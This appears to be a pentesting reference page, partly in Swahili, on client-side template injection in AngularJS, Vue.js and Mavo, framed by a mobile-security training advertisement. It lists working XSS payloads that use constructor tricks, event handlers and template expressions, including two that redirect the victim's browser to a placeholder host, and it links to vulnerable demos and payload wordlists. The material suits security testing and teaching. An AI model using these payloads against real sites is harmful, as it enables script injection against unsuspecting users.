Client Side Template Injection (CSTI)

Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:

On-demand Mobile Security Training | 8kSec Academy8kSec Academy

Summary

Ni kama Server Side Template Injection lakini katika mteja. SSTI inaweza kukuruhusu kufanya kazi kwenye seva ya mbali, CSTI inaweza kukuruhusu kufanya kazi ya JavaScript isiyo na mipaka katika kivinjari cha mwathirika.

Kujaribu udhaifu huu ni kama ilivyo katika kesi ya SSTI, mfasiri anatarajia kigezo na atakifanya. Kwa mfano, kwa payload kama {{ 7-7 }}, ikiwa programu ina udhaifu utaona 0, na ikiwa sivyo, utaona asili: {{ 7-7 }}

AngularJS

AngularJS ni mfumo maarufu wa JavaScript unaoshirikiana na HTML kupitia sifa zinazojulikana kama maagizo, moja maarufu ikiwa ng-app. Agizo hili linaruhusu AngularJS kushughulikia maudhui ya HTML, na kuwezesha utekelezaji wa maelekezo ya JavaScript ndani ya mabano mawili ya curly.

Katika hali ambapo input ya mtumiaji inaingizwa kwa nguvu katika mwili wa HTML ulio na lebo ng-app, inawezekana kutekeleza msimbo wa JavaScript isiyo na mipaka. Hii inaweza kufanywa kwa kutumia sintaksia ya AngularJS ndani ya input. Hapa chini kuna mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

You can find a very basic online example of the vulnerability in AngularJS in http://jsfiddle.net/2zs2yv7o/ and in Burp Suite Academy

VueJS

You can find a vulnerable Vue implementation in https://vue-client-side-template-injection-example.azu.now.sh/ Working payload: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

And the source code of the vulnerable example here: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

A really good post on CSTI in VUE can be found in https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Mwandiko: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Credit: Mario Heiderich

Angalia zaidi VUE payloads katika https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payload:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Zaidi ya payloads katika https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Orodha ya Ugunduzi wa Brute-Force

Auto_Wordlists/ssti.txt at main · carlospolop/Auto_WordlistsGitHub

Panua ujuzi wako katika Usalama wa Simu na 8kSec Academy. Master usalama wa iOS na Android kupitia kozi zetu za kujifunza kwa kasi yako na upate cheti:

On-demand Mobile Security Training | 8kSec Academy8kSec Academy